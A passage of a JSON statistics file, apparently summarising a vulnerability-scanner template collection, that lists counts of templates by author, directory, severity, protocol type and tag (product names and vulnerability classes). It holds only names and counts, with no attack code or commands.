(sillydaddy)","count":1},{"name":"regala_","count":1},{"name":"hanlaomo","count":1},{"name":"th3.d1p4k","count":1},{"name":"makyotox","count":1},{"name":"shelld3v","count":1},{"name":"mesaglio","count":1},{"name":"0xteles","count":1},{"name":"sshell","count":1},{"name":"zandros0","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"noamrathaus","count":1},{"name":"petruknisme","count":1},{"name":"0ut0fb4nd","count":1},{"name":"kabirsuda","count":1},{"name":"izn0u","count":1},{"name":"chron0x","count":1},{"name":"manuelbua","count":1},{"name":"ilovebinbash","count":1},{"name":"ohlinge","count":1},{"name":"undefl0w","count":1},{"name":"thezakman","count":1},{"name":"intx0x80","count":1},{"name":"tim_koopmans","count":1},{"name":"luci","count":1},{"name":"nytr0gen","count":1},{"name":"daviey","count":1},{"name":"deena","count":1},{"name":"gboddin","count":1},{"name":"smaranchand","count":1},{"name":"sickwell","count":1},{"name":"yavolo","count":1},{"name":"rotemreiss","count":1},{"name":"fopina","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"willd96","count":1},{"name":"evolutionsec","count":1},{"name":"b0yd","count":1},{"name":"sicksec","count":1},{"name":"rodnt","count":1},{"name":"push4d","count":1},{"name":"divya_mudgal","count":1},{"name":"raesene","count":1},{"name":"b4uh0lz","count":1},{"name":"juicypotato1","count":1},{"name":"d0rkerdevil","count":1},{"name":"52971","count":1},{"name":"geraldino2","count":1},{"name":"sec_hawk","count":1},{"name":"0xtavian","count":1},{"name":"_harleo","count":1},{"name":"wabafet","count":1},{"name":"bjhulst","count":1},{"name":"kareemse1im","count":1}],"directory":[{"name":"cves","count":803},{"name":"vulnerabilities","count":312},{"name":"exposed-panels","count":250},{"name":"technologies","count":199},{"name":"exposures","count":188},{"name":"misconfiguration","count":136},{"name":"takeovers","count":64},{"name":"default-logins","count":56},{"name":"file","count":46},{"name":"workflows","count":37},{"name":"network","count":34},{"name":"iot","count":25},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":660},{"name":"high","count":620},{"name":"medium","count":463},{"name":"critical","count":276},{"name":"low","count":154}],"types":[{"name":"http","count":2067},{"name":"file","count":46},{"name":"network","count":43},{"name":"dns","count":12}]} +{"tags":[{"name":"cve","count":804},{"name":"lfi","count":325},{"name":"xss","count":253},{"name":"panel","count":252},{"name":"wordpress","count":241},{"name":"exposure","count":233},{"name":"rce","count":200},{"name":"tech","count":191},{"name":"wp-plugin","count":167},{"name":"cve2020","count":164},{"name":"cve2021","count":139},{"name":"joomla","count":128},{"name":"cve2010","count":108},{"name":"cve2019","count":97},{"name":"config","count":94},{"name":"cve2018","count":86},{"name":"apache","count":70},{"name":"takeover","count":68},{"name":"iot","count":66},{"name":"token","count":65},{"name":"default-login","count":64},{"name":"oob","count":57},{"name":"cve2017","count":50},{"name":"unauth","count":47},{"name":"file","count":46},{"name":"network","count":43},{"name":"ssrf","count":40},{"name":"sqli","count":38},{"name":"","count":37},{"name":"oracle","count":36},{"name":"cve2016","count":36},{"name":"redirect","count":34},{"name":"logs","count":30},{"name":"jira","count":28},{"name":"cve2014","count":27},{"name":"atlassian","count":27},{"name":"listing","count":27},{"name":"cve2015","count":26},{"name":"generic","count":23},{"name":"auth-bypass","count":23},{"name":"misc","count":23},{"name":"disclosure","count":22},{"name":"router","count":20},{"name":"cisco","count":19},{"name":"aem","count":19},{"name":"debug","count":18},{"name":"sap","count":18},{"name":"springboot","count":18},{"name":"misconfig","count":18},{"name":"cve2012","count":17},{"name":"php","count":16},{"name":"cve2011","count":15},{"name":"cve2009","count":14},{"name":"weblogic","count":14},{"name":"struts","count":14},{"name":"login","count":14},{"name":"fuzz","count":14},{"name":"android","count":13},{"name":"dns","count":13},{"name":"adobe","count":13},{"name":"devops","count":13},{"name":"zoho","count":13},{"name":"aws","count":12},{"name":"dlink","count":12},{"name":"jenkins","count":12},{"name":"manageengine","count":12},{"name":"cve2013","count":11},{"name":"wp-theme","count":11},{"name":"xxe","count":10},{"name":"dell","count":10},{"name":"vmware","count":9},{"name":"magento","count":9},{"name":"ftp","count":9},{"name":"intrusive","count":9},{"name":"gitlab","count":8},{"name":"rails","count":8},{"name":"cnvd","count":8},{"name":"airflow","count":8},{"name":"ruijie","count":8},{"name":"cve2008","count":8},{"name":"scada","count":8},{"name":"nginx","count":8},{"name":"cms","count":7},{"name":"coldfusion","count":7},{"name":"netgear","count":7},{"name":"ibm","count":7},{"name":"microsoft","count":7},{"name":"google","count":7},{"name":"backup","count":7},{"name":"confluence","count":7},{"name":"files","count":7},{"name":"kubernetes","count":7},{"name":"laravel","count":6},{"name":"solr","count":6},{"name":"django","count":6},{"name":"rconfig","count":6},{"name":"citrix","count":6},{"name":"camera","count":6},{"name":"hp","count":6},{"name":"api","count":6},{"name":"docker","count":6},{"name":"jetty","count":6},{"name":"java","count":5},{"name":"ssti","count":5},{"name":"fileupload","count":5},{"name":"headless","count":5},{"name":"drupal","count":5},{"name":"iis","count":5},{"name":"phpmyadmin","count":5},{"name":"deserialization","count":5},{"name":"nodejs","count":5},{"name":"circarlife","count":5},{"name":"tomcat","count":5},{"name":"windows","count":5},{"name":"lucee","count":5},{"name":"printer","count":5},{"name":"jolokia","count":5},{"name":"dedecms","count":5},{"name":"rfi","count":4},{"name":"elastic","count":4},{"name":"magmi","count":4},{"name":"asp","count":4},{"name":"samsung","count":4},{"name":"proxy","count":4},{"name":"thinkcmf","count":4},{"name":"symantec","count":4},{"name":"vpn","count":4},{"name":"glpi","count":4},{"name":"git","count":4},{"name":"artifactory","count":4},{"name":"zabbix","count":4},{"name":"moodle","count":4},{"name":"buffalo","count":4},{"name":"firmware","count":4},{"name":"fatpipe","count":4},{"name":"zimbra","count":4},{"name":"solarwinds","count":4},{"name":"strapi","count":4},{"name":"wso2","count":4},{"name":"exchange","count":4},{"name":"crlf","count":4},{"name":"resin","count":4},{"name":"symfony","count":4},{"name":"thinkphp","count":4},{"name":"traversal","count":4},{"name":"grafana","count":4},{"name":"hongdian","count":4},{"name":"webserver","count":4},{"name":"telerik","count":3},{"name":"ebs","count":3},{"name":"springcloud","count":3},{"name":"openssh","count":3},{"name":"zhiyuan","count":3},{"name":"lfr","count":3},{"name":"vbulletin","count":3},{"name":"terramaster","count":3},{"name":"azure","count":3},{"name":"opensis","count":3},{"name":"kibana","count":3},{"name":"hoteldruid","count":3},{"name":"prometheus","count":3},{"name":"tikiwiki","count":3},{"name":"caucho","count":3},{"name":"linkerd","count":3},{"name":"microstrategy","count":3},{"name":"cacti","count":3},{"name":"nosqli","count":3},{"name":"backups","count":3},{"name":"kevinlab","count":3},{"name":"itop","count":3},{"name":"bigip","count":3},{"name":"smtp","count":3},{"name":"targa","count":3},{"name":"bitrix","count":3},{"name":"kafka","count":3},{"name":"mail","count":3},{"name":"npm","count":3},{"name":"jeesns","count":3},{"name":"amazon","count":3},{"name":"druid","count":3},{"name":"slack","count":3},{"name":"httpd","count":3},{"name":"mongodb","count":3},{"name":"fpd","count":3},{"name":"log","count":3},{"name":"cve2007","count":3},{"name":"ssh","count":3},{"name":"ofbiz","count":3},{"name":"nacos","count":3},{"name":"injection","count":3},{"name":"openam","count":3},{"name":"oa","count":3},{"name":"jellyfin","count":3},{"name":"fanruan","count":3},{"name":"r-seenet","count":3},{"name":"backdoor","count":3},{"name":"nexus","count":3},{"name":"firebase","count":3},{"name":"seeyon","count":2},{"name":"axis2","count":2},{"name":"wuzhicms","count":2},{"name":"ilo","count":2},{"name":"dos","count":2},{"name":"mida","count":2},{"name":"yapi","count":2},{"name":"sitecore","count":2},{"name":"couchdb","count":2},{"name":"avantfax","count":2},{"name":"middleware","count":2},{"name":"chyrp","count":2},{"name":"natshell","count":2},{"name":"liferay","count":2},{"name":"vrealize","count":2},{"name":"globalprotect","count":2},{"name":"splunk","count":2},{"name":"aruba","count":2},{"name":"igs","count":2},{"name":"nextjs","count":2},{"name":"linux","count":2},{"name":"odoo","count":2},{"name":"geowebserver","count":2},{"name":"chiyu","count":2},{"name":"github","count":2},{"name":"commax","count":2},{"name":"bypass","count":2},{"name":"plesk","count":2},{"name":"prtg","count":2},{"name":"rockmongo","count":2},{"name":"netis","count":2},{"name":"tidb","count":2},{"name":"pega","count":2},{"name":"nagios","count":2},{"name":"favicon","count":2},{"name":"jsf","count":2},{"name":"wordfence","count":2},{"name":"guacamole","count":2},{"name":"hostheader-injection","count":2},{"name":"qcubed","count":2},{"name":"waf","count":2},{"name":"keycloak","count":2},{"name":"ecoa","count":2},{"name":"aviatrix","count":2},{"name":"sonarqube","count":2},{"name":"huawei","count":2},{"name":"prestashop","count":2},{"name":"mcafee","count":2},{"name":"hjtcloud","count":2},{"name":"enumeration","count":2},{"name":"phpcollab","count":2},{"name":"glassfish","count":2},{"name":"emerge","count":2},{"name":"payara","count":2},{"name":"webcam","count":2},{"name":"cve2005","count":2},{"name":"getsimple","count":2},{"name":"ucmdb","count":2},{"name":"voipmonitor","count":2},{"name":"grav","count":2},{"name":"bucket","count":2},{"name":"saltstack","count":2},{"name":"status","count":2},{"name":"jeedom","count":2},{"name":"showdoc","count":2},{"name":"smb","count":2},{"name":"sharepoint","count":2},{"name":"dolibarr","count":2},{"name":"db","count":2},{"name":"hpe","count":2},{"name":"openfire","count":2},{"name":"trixbox","count":2},{"name":"hashicorp","count":2},{"name":"openvpn","count":2},{"name":"cache","count":2},{"name":"kentico","count":2},{"name":"idrac","count":2},{"name":"leak","count":2},{"name":"minio","count":2},{"name":"fortios","count":2},{"name":"activemq","count":2},{"name":"ec2","count":2},{"name":"totemomail","count":2},{"name":"maian","count":2},{"name":"service","count":2},{"name":"akkadian","count":2},{"name":"kong","count":2},{"name":"hasura","count":2},{"name":"sonicwall","count":2},{"name":"chamilo","count":2},{"name":"upload","count":2},{"name":"adminer","count":2},{"name":"jboss","count":2},{"name":"axis","count":2},{"name":"xxljob","count":2},{"name":"akamai","count":2},{"name":"nextcloud","count":2},{"name":"frp","count":2},{"name":"oauth","count":2},{"name":"bruteforce","count":2},{"name":"shellshock","count":2},{"name":"harbor","count":2},{"name":"rstudio","count":2},{"name":"icewarp","count":2},{"name":"yii","count":2},{"name":"ecology","count":2},{"name":"flir","count":2},{"name":"spark","count":2},{"name":"node","count":2},{"name":"netsweeper","count":2},{"name":"paloalto","count":2},{"name":"storage","count":2},{"name":"horde","count":2},{"name":"vcenter","count":2},{"name":"webadmin","count":1},{"name":"flink","count":1},{"name":"kindeditor","count":1},{"name":"sidekiq","count":1},{"name":"opensns","count":1},{"name":"werkzeug","count":1},{"name":"timeclock","count":1},{"name":"postmessage","count":1},{"name":"razor","count":1},{"name":"argussurveillance","count":1},{"name":"skywalking","count":1},{"name":"karel","count":1},{"name":"kyan","count":1},{"name":"gilacms","count":1},{"name":"zenario","count":1},{"name":"parentlink","count":1},{"name":"rocketchat","count":1},{"name":"mysql","count":1},{"name":"sentry","count":1},{"name":"ghost","count":1},{"name":"opensmtpd","count":1},{"name":"idemia","count":1},{"name":"nsasg","count":1},{"name":"dnssec","count":1},{"name":"jenzabar","count":1},{"name":"nimble","count":1},{"name":"arl","count":1},{"name":"fastcgi","count":1},{"name":"grails","count":1},{"name":"shopxo","count":1},{"name":"rdp","count":1},{"name":"sar2html","count":1},{"name":"etouch","count":1},{"name":"adb","count":1},{"name":"portainer","count":1},{"name":"saltapi","count":1},{"name":"gateone","count":1},{"name":"comodo","count":1},{"name":"cve2006","count":1},{"name":"frontpage","count":1},{"name":"myvuehelp","count":1},{"name":"daybyday","count":1},{"name":"mediumish","count":1},{"name":"swagger","count":1},{"name":"uwsgi","count":1},{"name":"accela","count":1},{"name":"novnc","count":1},{"name":"sangfor","count":1},{"name":"wooyun","count":1},{"name":"xiuno","count":1},{"name":"pihole","count":1},{"name":"wamp","count":1},{"name":"ntopng","count":1},{"name":"gurock","count":1},{"name":"fortilogger","count":1},{"name":"maxsite","count":1},{"name":"vnc","count":1},{"name":"viewpoint","count":1},{"name":"landrayoa","count":1},{"name":"metabase","count":1},{"name":"moinmoin","count":1},{"name":"tongda","count":1},{"name":"acexy","count":1},{"name":"natemail","count":1},{"name":"woocommerce","count":1},{"name":"klog","count":1},{"name":"huijietong","count":1},{"name":"email","count":1},{"name":"solman","count":1},{"name":"lancom","count":1},{"name":"camunda","count":1},{"name":"wiki","count":1},{"name":"beanstalk","count":1},{"name":"weiphp","count":1},{"name":"websvn","count":1},{"name":"phalcon","count":1},{"name":"kubeflow","count":1},{"name":"twitter-server","count":1},{"name":"netgenie","count":1},{"name":"xampp","count":1},{"name":"shopizer","count":1},{"name":"sgp","count":1},{"name":"tieline","count":1},{"name":"spectracom","count":1},{"name":"qdpm","count":1},{"name":"empirecms","count":1},{"name":"jeewms","count":1},{"name":"phpfusion","count":1},{"name":"aspnuke","count":1},{"name":"panos","count":1},{"name":"ssl","count":1},{"name":"mongo","count":1},{"name":"servicedesk","count":1},{"name":"rockethchat","count":1},{"name":"csrfguard","count":1},{"name":"cobub","count":1},{"name":"nifi","count":1},{"name":"netmask","count":1},{"name":"zeroshell","count":1},{"name":"zmanda","count":1},{"name":"varnish","count":1},{"name":"fedora","count":1},{"name":"cgi","count":1},{"name":"okta","count":1},{"name":"soar","count":1},{"name":"dom","count":1},{"name":"cofax","count":1},{"name":"st","count":1},{"name":"spip","count":1},{"name":"zarafa","count":1},{"name":"bolt","count":1},{"name":"nweb2fax","count":1},{"name":"avalanche","count":1},{"name":"embedthis","count":1},{"name":"cockpit","count":1},{"name":"openemr","count":1},{"name":"goahead","count":1},{"name":"chevereto","count":1},{"name":"totaljs","count":1},{"name":"cerebro","count":1},{"name":"triconsole","count":1},{"name":"jsp","count":1},{"name":"gstorage","count":1},{"name":"nedi","count":1},{"name":"lotus","count":1},{"name":"alertmanager","count":1},{"name":"tcexam","count":1},{"name":"resourcespace","count":1},{"name":"zzzcms","count":1},{"name":"smi","count":1},{"name":"checkpoint","count":1},{"name":"beanshell","count":1},{"name":"alerta","count":1},{"name":"motorola","count":1},{"name":"jfrog","count":1},{"name":"springframework","count":1},{"name":"terraform","count":1},{"name":"smartsense","count":1},{"name":"ssltls","count":1},{"name":"solarlog","count":1},{"name":"tapestry","count":1},{"name":"graphite","count":1},{"name":"stem","count":1},{"name":"artica","count":1},{"name":"sophos","count":1},{"name":"openstack","count":1},{"name":"duomicms","count":1},{"name":"ueditor","count":1},{"name":"meraki","count":1},{"name":"pagespeed","count":1},{"name":"perl","count":1},{"name":"synnefo","count":1},{"name":"tjws","count":1},{"name":"pulsesecure","count":1},{"name":"clickhouse","count":1},{"name":"scs","count":1},{"name":"clockwork","count":1},{"name":"shopware","count":1},{"name":"office365","count":1},{"name":"codemeter","count":1},{"name":"fuelcms","count":1},{"name":"zm","count":1},{"name":"owasp","count":1},{"name":"krweb","count":1},{"name":"thinkadmin","count":1},{"name":"blind","count":1},{"name":"circontrol","count":1},{"name":"zyxel","count":1},{"name":"yealink","count":1},{"name":"fortigates","count":1},{"name":"yzmcms","count":1},{"name":"openx","count":1},{"name":"optiLink","count":1},{"name":"rsyncd","count":1},{"name":"darkstat","count":1},{"name":"maccmsv10","count":1},{"name":"simplecrm","count":1},{"name":"mpsec","count":1},{"name":"alibaba","count":1},{"name":"esmtp","count":1},{"name":" default-login","count":1},{"name":"extractor","count":1},{"name":"csod","count":1},{"name":"pacsone","count":1},{"name":"scimono","count":1},{"name":"zte","count":1},{"name":"zend","count":1},{"name":"tensorflow","count":1},{"name":"elasticsearch","count":1},{"name":"concrete","count":1},{"name":"listserv","count":1},{"name":"discord","count":1},{"name":"iceflow","count":1},{"name":"tectuus","count":1},{"name":"dvr","count":1},{"name":"apiman","count":1},{"name":"ganglia","count":1},{"name":"blue-ocean","count":1},{"name":"miscrsoft","count":1},{"name":"rmi","count":1},{"name":"plastic","count":1},{"name":"owa","count":1},{"name":"wildfly","count":1},{"name":"appweb","count":1},{"name":"cloudron","count":1},{"name":"apos","count":1},{"name":"qvisdvr","count":1},{"name":"gitea","count":1},{"name":"fiori","count":1},{"name":"sage","count":1},{"name":"crm","count":1},{"name":"wazuh","count":1},{"name":"clink-office","count":1},{"name":"jitsi","count":1},{"name":"wavemaker","count":1},{"name":"floc","count":1},{"name":"tracer","count":1},{"name":"announcekit","count":1},{"name":"hiawatha","count":1},{"name":"phpinfo","count":1},{"name":"omi","count":1},{"name":"commscope","count":1},{"name":"majordomo2","count":1},{"name":"websphere","count":1},{"name":"magicflow","count":1},{"name":"ns","count":1},{"name":"bookstack","count":1},{"name":"basic-auth","count":1},{"name":"upnp","count":1},{"name":"spf","count":1},{"name":"vsftpd","count":1},{"name":"yachtcontrol","count":1},{"name":"trilithic","count":1},{"name":"sprintful","count":1},{"name":"redhat","count":1},{"name":"dvwa","count":1},{"name":"javamelody","count":1},{"name":"emby","count":1},{"name":"jenkin","count":1},{"name":"heroku","count":1},{"name":"dotnetnuke","count":1},{"name":"rhymix","count":1},{"name":"xdcms","count":1},{"name":"asus","count":1},{"name":"lutron","count":1},{"name":"avtech","count":1},{"name":"k8","count":1},{"name":"wavlink","count":1},{"name":"trane","count":1},{"name":"traefik","count":1},{"name":"tenda","count":1},{"name":"mariadb","count":1},{"name":"tamronos","count":1},{"name":"pyramid","count":1},{"name":"expn","count":1},{"name":"s3","count":1},{"name":"jmx","count":1},{"name":"mrtg","count":1},{"name":"webui","count":1},{"name":"zookeeper","count":1},{"name":"haproxy","count":1},{"name":"dotnet","count":1},{"name":"oidc","count":1},{"name":"logontracer","count":1},{"name":"octoprint","count":1},{"name":"cors","count":1},{"name":"sarg","count":1},{"name":"phpshowtime","count":1},{"name":"wondercms","count":1},{"name":"tileserver","count":1},{"name":"mantisbt","count":1},{"name":"achecker","count":1},{"name":"dompdf","count":1},{"name":"linksys","count":1},{"name":"smartblog","count":1},{"name":"sco","count":1},{"name":"mobileiron","count":1},{"name":"nette","count":1},{"name":"kafdrop","count":1},{"name":"acontent","count":1},{"name":"emc","count":1},{"name":"vscode","count":1},{"name":"spidercontrol","count":1},{"name":"expose","count":1},{"name":"panabit","count":1},{"name":"metinfo","count":1},{"name":"clusterengine","count":1},{"name":"mantis","count":1},{"name":"mara","count":1},{"name":"centos","count":1},{"name":"openerp","count":1},{"name":"phpwiki","count":1},{"name":"ecom","count":1},{"name":"feifeicms","count":1},{"name":"luftguitar","count":1},{"name":"fortiweb","count":1},{"name":"olivetti","count":1},{"name":"rujjie","count":1},{"name":"k8s","count":1},{"name":"exacqvision","count":1},{"name":"labtech","count":1},{"name":"acme","count":1},{"name":"anchorcms","count":1},{"name":"episerver","count":1},{"name":"mirai","count":1},{"name":"kerbynet","count":1},{"name":"octobercms","count":1},{"name":"exposures","count":1},{"name":"dbeaver","count":1},{"name":"addpac","count":1},{"name":"robomongo","count":1},{"name":"cloudinary","count":1},{"name":"plc","count":1},{"name":"zcms","count":1},{"name":"pmb","count":1},{"name":"redis","count":1},{"name":"nuuo","count":1},{"name":"htmli","count":1},{"name":"oscommerce","count":1},{"name":"webmin","count":1},{"name":"starttls","count":1},{"name":"graylog","count":1},{"name":"gitlist","count":1},{"name":"xvr","count":1},{"name":"opm","count":1},{"name":"gotmls","count":1},{"name":"subrion","count":1},{"name":"nomad","count":1},{"name":"vidyo","count":1},{"name":"bigbluebutton","count":1},{"name":"api-manager","count":1},{"name":"imap","count":1},{"name":"domxss","count":1},{"name":"whm","count":1},{"name":"processmaker","count":1},{"name":"default","count":1},{"name":"eg","count":1},{"name":"sourcebans","count":1},{"name":"pgadmin","count":1},{"name":"nuxeo","count":1},{"name":"jnoj","count":1},{"name":"centreon","count":1},{"name":"tensorboard","count":1},{"name":"aura","count":1},{"name":"mailchimp","count":1},{"name":"svn","count":1},{"name":"xmlchart","count":1},{"name":"h3c-imc","count":1},{"name":"woocomernce","count":1},{"name":"visionhub","count":1},{"name":"cherokee","count":1},{"name":"postgres","count":1},{"name":"opentsdb","count":1},{"name":"ems","count":1},{"name":"fastapi","count":1},{"name":"nordex","count":1},{"name":"pippoint","count":1},{"name":"szhe","count":1},{"name":"iptime","count":1},{"name":"hadoop","count":1},{"name":"jquery","count":1},{"name":"cocoon","count":1},{"name":"selea","count":1},{"name":"calendarix","count":1},{"name":"gridx","count":1},{"name":"bullwark","count":1},{"name":"mdb","count":1},{"name":"netdata","count":1},{"name":"shiro","count":1},{"name":"webmodule-ee","count":1},{"name":"phpfastcache","count":1},{"name":"ruby","count":1},{"name":"expressjs","count":1},{"name":"nc2","count":1},{"name":"tpshop","count":1},{"name":"ognl","count":1},{"name":"bazarr","count":1},{"name":"b2evolution","count":1},{"name":"sureline","count":1},{"name":"glowroot","count":1},{"name":"ricoh","count":1},{"name":"azkaban","count":1},{"name":"rmc","count":1},{"name":"wmt","count":1},{"name":"cscart","count":1},{"name":"elascticsearch","count":1},{"name":"interlib","count":1},{"name":"graphql","count":1},{"name":"doh","count":1},{"name":"cyberoam","count":1},{"name":"finereport","count":1},{"name":"myucms","count":1},{"name":"javafaces","count":1},{"name":"fortinet","count":1},{"name":"influxdb","count":1},{"name":"plone","count":1},{"name":"actuator","count":1},{"name":"opencast","count":1},{"name":"fortigate","count":1},{"name":"primetek","count":1},{"name":"landray","count":1},{"name":"vsphere","count":1},{"name":"gogs","count":1},{"name":"lg-nas","count":1},{"name":"pcoip","count":1},{"name":"panasonic","count":1},{"name":"bedita","count":1},{"name":"faraday","count":1},{"name":"jaspersoft","count":1},{"name":"dotclear","count":1},{"name":"monitorix","count":1},{"name":"database","count":1},{"name":"burp","count":1},{"name":"webftp","count":1},{"name":"ilo4","count":1},{"name":"sceditor","count":1},{"name":"node-red-dashboard","count":1},{"name":"redmine","count":1},{"name":"froxlor","count":1},{"name":"lanproxy","count":1},{"name":"eyelock","count":1},{"name":"discourse","count":1},{"name":"javascript","count":1},{"name":"cloudflare","count":1},{"name":"clave","count":1},{"name":"xunchi","count":1},{"name":"sql","count":1},{"name":"ioncube","count":1},{"name":"wifisky","count":1},{"name":"lansweeper","count":1},{"name":"viewlinc","count":1},{"name":"zms","count":1},{"name":"circontrorl","count":1},{"name":"mautic","count":1},{"name":"biometrics","count":1},{"name":"74cms","count":1},{"name":"gloo","count":1},{"name":"eprints","count":1},{"name":"auth","count":1},{"name":"xml","count":1},{"name":"monitorr","count":1},{"name":"socomec","count":1},{"name":"openrestry","count":1},{"name":"realteo","count":1},{"name":"salesforce","count":1},{"name":"netrc","count":1},{"name":"svnserve","count":1},{"name":"testrail","count":1},{"name":"wing-ftp","count":1},{"name":"geddy","count":1},{"name":"codeigniter","count":1},{"name":"nexusdb","count":1},{"name":"redwood","count":1},{"name":"ulterius","count":1},{"name":"minimouse","count":1},{"name":"visualtools","count":1},{"name":"clockwatch","count":1},{"name":"craftcms","count":1},{"name":"qsan","count":1},{"name":"tika","count":1},{"name":"plugin","count":1},{"name":"turbocrm","count":1},{"name":"hortonworks","count":1},{"name":"couchbase","count":1},{"name":"bash","count":1},{"name":"blackboard","count":1},{"name":"cse","count":1},{"name":"moin","count":1},{"name":"bitly","count":1},{"name":"diris","count":1},{"name":"timesheet","count":1},{"name":"shoppable","count":1},{"name":"ewebs","count":1},{"name":"seacms","count":1},{"name":"gunicorn","count":1},{"name":"geutebruck","count":1},{"name":"proftpd","count":1},{"name":"sqlite","count":1},{"name":"hiboss","count":1},{"name":"erp-nc","count":1},{"name":"linkedin","count":1},{"name":"elfinder","count":1},{"name":"servicenow","count":1},{"name":"keenetic","count":1},{"name":"livezilla","count":1},{"name":"etherpad","count":1},{"name":"csrf","count":1},{"name":"exponentcms","count":1},{"name":"spring","count":1},{"name":"lotuscms","count":1},{"name":"rabbitmq","count":1},{"name":"memcached","count":1},{"name":"redcap","count":1},{"name":"mongoshake","count":1},{"name":"rubedo","count":1},{"name":"lighttpd","count":1},{"name":"powercreator","count":1},{"name":"drone","count":1},{"name":"tor","count":1},{"name":"shoretel","count":1},{"name":"phpunit","count":1},{"name":"eyou","count":1},{"name":"gsoap","count":1},{"name":"chinaunicom","count":1},{"name":"nps","count":1},{"name":"gespage","count":1},{"name":"ruckus","count":1},{"name":"ambari","count":1},{"name":"glances","count":1},{"name":"setup","count":1},{"name":"oneblog","count":1}],"authors":[{"name":"daffainfo","count":280},{"name":"pikpikcu","count":277},{"name":"dhiyaneshdk","count":268},{"name":"pdteam","count":199},{"name":"geeknik","count":154},{"name":"dwisiswant0","count":131},{"name":"gy741","count":77},{"name":"pussycat0x","count":70},{"name":"princechaddha","count":63},{"name":"madrobot","count":61},{"name":"0x_akoko","count":43},{"name":"gaurang","count":42},{"name":"philippedelteil","count":27},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":14},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"righettod","count":10},{"name":"random_robbie","count":10},{"name":"wdahlenb","count":10},{"name":"nadino","count":9},{"name":"melbadry9","count":9},{"name":"hackergautam","count":9},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"emadshanab","count":7},{"name":"techryptic (@tech)","count":7},{"name":"harshbothra_","count":7},{"name":"kophjager007","count":7},{"name":"randomstr1ng","count":7},{"name":"meme-lord","count":7},{"name":"dr_set","count":7},{"name":"oppsec","count":7},{"name":"0x240x23elu","count":7},{"name":"dogasantos","count":7},{"name":"pentest_swissky","count":6},{"name":"puzzlepeaches","count":6},{"name":"logicalhunter","count":6},{"name":"caspergn","count":6},{"name":"__fazal","count":6},{"name":"iamnoooob","count":5},{"name":"ganofins","count":5},{"name":"rootxharsh","count":5},{"name":"lu4nx","count":5},{"name":"elsfa7110","count":5},{"name":"panch0r3d","count":5},{"name":"joanbono","count":5},{"name":"yanyun","count":5},{"name":"nodauf","count":4},{"name":"xelkomy","count":4},{"name":"github.com/its0x08","count":4},{"name":"e_schultze_","count":4},{"name":"z3bd","count":3},{"name":"_generic_human_","count":3},{"name":"dudez","count":3},{"name":"skeltavik","count":3},{"name":"johnk3r","count":3},{"name":"thomas_from_offensity","count":3},{"name":"shifacyclewala","count":3},{"name":"impramodsargar","count":3},{"name":"0w4ys","count":3},{"name":"incogbyte","count":3},{"name":"f1tz","count":3},{"name":"shine","count":3},{"name":"sushantkamble","count":3},{"name":"unstabl3","count":3},{"name":"tess","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"binaryfigments","count":3},{"name":"mavericknerd","count":3},{"name":"fyoorer","count":3},{"name":"vsh00t","count":3},{"name":"jarijaas","count":3},{"name":"idealphase","count":3},{"name":"emenalf","count":3},{"name":"random-robbie","count":2},{"name":"0xcrypto","count":2},{"name":"mohammedsaneem","count":2},{"name":"0xprial","count":2},{"name":"bp0lr","count":2},{"name":"davidmckennirey","count":2},{"name":"kiblyn11","count":2},{"name":"gal nagli","count":2},{"name":"hetroublemakr","count":2},{"name":"manas_harsh","count":2},{"name":"ehsahil","count":2},{"name":"gevakun","count":2},{"name":"vavkamil","count":2},{"name":"hahwul","count":2},{"name":"bing0o","count":2},{"name":"x1m_martijn","count":2},{"name":"0xelkomy","count":2},{"name":"socketz","count":2},{"name":"dheerajmadhukar","count":2},{"name":"afaq","count":2},{"name":"bernardofsr","count":2},{"name":"bsysop","count":2},{"name":"arcc","count":2},{"name":"johnjhacking","count":2},{"name":"whoever","count":2},{"name":"foulenzer","count":2},{"name":"r3naissance","count":2},{"name":"0xsapra","count":2},{"name":"swissky","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"ree4pwn","count":2},{"name":"cocxanh","count":2},{"name":"0xsmiley","count":2},{"name":"zomsop82","count":2},{"name":"fabaff","count":2},{"name":"udit_thakkur","count":2},{"name":"huowuzhao","count":2},{"name":"0xrudra","count":2},{"name":"g4l1t0","count":2},{"name":"lotusdll","count":2},{"name":"alifathi-h1","count":2},{"name":"koti2","count":2},{"name":"moritz nentwig","count":2},{"name":"pxmme1337","count":2},{"name":"nkxxkn","count":2},{"name":"w4cky_","count":2},{"name":"parth","count":2},{"name":"convisoappsec","count":2},{"name":"joeldeleep","count":2},{"name":"randomrobbie","count":2},{"name":"amsda","count":2},{"name":"un-fmunozs","count":1},{"name":"udyz","count":1},{"name":"berkdusunur","count":1},{"name":"0h1in9e","count":1},{"name":"nerrorsec","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"regala_","count":1},{"name":"retr0","count":1},{"name":"b4uh0lz","count":1},{"name":"push4d","count":1},{"name":"taielab","count":1},{"name":"adrianmf","count":1},{"name":"d0rkerdevil","count":1},{"name":"defr0ggy","count":1},{"name":"deena","count":1},{"name":"zhenwarx","count":1},{"name":"knassar702","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"bolli95","count":1},{"name":"bad5ect0r","count":1},{"name":"whynotke","count":1},{"name":"streetofhackerr007","count":1},{"name":"alperenkesk","count":1},{"name":"_darrenmartyn","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"ooooooo_q","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"ilovebinbash","count":1},{"name":"xstp","count":1},{"name":"geraldino2","count":1},{"name":"x6263","count":1},{"name":"willd96","count":1},{"name":"petruknisme","count":1},{"name":"mah3sec_","count":1},{"name":"s1r1u5_","count":1},{"name":"thezakman","count":1},{"name":"vzamanillo","count":1},{"name":"rojanrijal","count":1},{"name":"52971","count":1},{"name":"sec_hawk","count":1},{"name":"shifacyclewla","count":1},{"name":"co0nan","count":1},{"name":"hakluke","count":1},{"name":"ratnadip 